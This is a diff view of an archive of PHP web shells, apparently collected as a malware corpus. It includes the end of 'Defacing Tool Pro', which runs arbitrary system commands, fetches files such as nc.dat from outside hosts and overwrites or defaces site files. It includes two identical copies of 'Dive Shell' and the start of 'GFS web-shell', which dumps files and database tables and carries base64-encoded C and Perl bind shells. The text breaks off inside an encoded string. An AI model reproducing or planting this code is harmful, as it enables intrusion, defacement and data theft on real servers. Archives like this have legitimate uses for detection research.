if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$safe = @ini_get($safemode);
if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
$pro8 = "<i>PHP </i>".phpversion();
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="focar();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
<script>
function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
</script>
</td></tr></table><table><tr><td>
<?php
ob_start();
if(isset($chdir)) @chdir($chdir);
function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
function shell($what){echo(shell_exec($what));}
function popenn($what){
$handle=popen("$what", "r");
$out=@fread($handle, 2096);
echo $out;
@pclose($handle);
}
function execc($what){
exec("$what",$array_out);
$out=implode("\n",$array_out);
echo $out;
}
function procc($what){
//na sequencia: stdin, stdout, sterr
if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
$process = @proc_open("$what",$descpec,$pipes);
if (is_resource($process)) {
fwrite($pipes[0], "");
fclose($pipes[0]);
while(!feof($pipes[2])) {
$erro_retorno = fgets($pipes[2], 4096);
if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
}
fclose($pipes[2]);
while(!feof($pipes[1])) {
echo fgets($pipes[1], 4096);
}
fclose($pipes[1]);
$ok_p_fecha = @proc_close($process);
}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
}
$funE="function_exists";
if($safe){$fe="safemode";$feshow=$fe;}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
else {$fe="nofunction";$feshow=$fe;}
if($fu!="0" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
if($fu==6){$fe="procc";$feshow="proc_open";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="6">use proc_open()*new
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table>

187
web-malware-collection-13-06-2012/PHP/Dive Shell 1.0 - Emperor Hacking Team.php Normal file
View file

@ -0,0 +1,187 @@
<?php
/*Emperor Hacking TEAM */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
?>
<head>
<title>Dive Shell - Emperor Hacking Team</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
</head>
<body onload="init()" style="color: #00FF00; background-color: #000000">
<span style="background-color: #FFFFFF">
</body>
</body>
</html>
</span>
<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
</font></p>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
<div style="width: 989; height: 456">
<p align="center"><b>
<font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
<input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
</font>
&nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea> </p>
<p class="prompt" align="center">
<b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
<p class="prompt" align="center">
<b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
<p class="prompt" align="center">
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
&nbsp;</font></p>
</div>
</form>
<p class="prompt" align="center">
<b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
</b></p>
</html>

187
web-malware-collection-13-06-2012/PHP/Dive Shell 1.0 - Emperor Hacking Team.txt Normal file
View file

@ -0,0 +1,187 @@
<?php
/*Emperor Hacking TEAM */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
?>
<head>
<title>Dive Shell - Emperor Hacking Team</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
</head>
<body onload="init()" style="color: #00FF00; background-color: #000000">
<span style="background-color: #FFFFFF">
</body>
</body>
</html>
</span>
<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
</font></p>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
<div style="width: 989; height: 456">
<p align="center"><b>
<font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
<input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
</font>
&nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea> </p>
<p class="prompt" align="center">
<b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
<p class="prompt" align="center">
<b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
<p class="prompt" align="center">
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
&nbsp;</font></p>
</div>
</form>
<p class="prompt" align="center">
<b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
</b></p>
</html>

2026
web-malware-collection-13-06-2012/PHP/Dx.txt Normal file
View file

File diff suppressed because one or more lines are too long

2111
web-malware-collection-13-06-2012/PHP/DxShell.1.0.txt Normal file
View file

File diff suppressed because one or more lines are too long

3107
web-malware-collection-13-06-2012/PHP/FaTaLisTiCz_Fx.txt Normal file
View file

File diff suppressed because it is too large Load diff

7006
web-malware-collection-13-06-2012/PHP/Fx29Sh.3.2.12.08.txt Normal file
View file

File diff suppressed because it is too large Load diff

1555
web-malware-collection-13-06-2012/PHP/G5.php Normal file
View file

File diff suppressed because it is too large Load diff

618
web-malware-collection-13-06-2012/PHP/GFS web-shell ver 3.1.7 - PRiV8.txt Normal file
View file

@ -0,0 +1,618 @@
<?
/*
*************************
* ###### ##### ###### *
* ###### ##### ###### *
* ## ## ## *
* ## #### ###### *
* ## ## #### ###### *
* ## ## ## ## *
* ###### ## ###### *
* ###### ## ###### *
* *
* Group Freedom Search! *
*************************
GFS Web-Shell
*/
error_reporting(0);
if($_POST['b_down']){
$file=fopen($_POST['fname'],"r");
ob_clean();
$filename=basename($_POST['fname']);
$filedump=fread($file,filesize($_POST['fname']));
fclose($file);
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
if($_POST['b_dtable']){
$dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
if($dump!=""){
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
exit();
}else
die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
}
set_magic_quotes_runtime(0);
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('output_buffering',0);
if(version_compare(phpversion(), '4.1.0')==-1){
$_POST=&$HTTP_POST_VARS;
$_GET=&$HTTP_GET_VARS;
$_SERVER=&$HTTP_SERVER_VARS;
}
if (get_magic_quotes_gpc()){
foreach ($_POST as $k=>$v){
$_POST[$k]=stripslashes($v);
}
foreach ($_SERVER as $k=>$v){
$_SERVER[$k]=stripslashes($v);
}
}
if ($_POST['username']==""){
$_POST['username']="root";
}
////////////////////////////////////////////////////////////////////////////////
///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
$r_act=$_POST['r_act'];
$safe_mode=ini_get('safe_mode'); //ñòàòóñ áåçîïàñíîãî ðåæèìà
$mysql_stat=function_exists('mysql_connect'); //Íàëè÷èå mysql
$curl_on=function_exists('curl_version'); //íàëè÷èå cURL
$dis_func=ini_get('disable_functions'); //çàáëîêèðîâàíûå ôóíêöèè
$HTML=<<<html
<html>
<head>
<title>GFS web-shell ver 3.1.7</title>
</head>
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
html;
$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
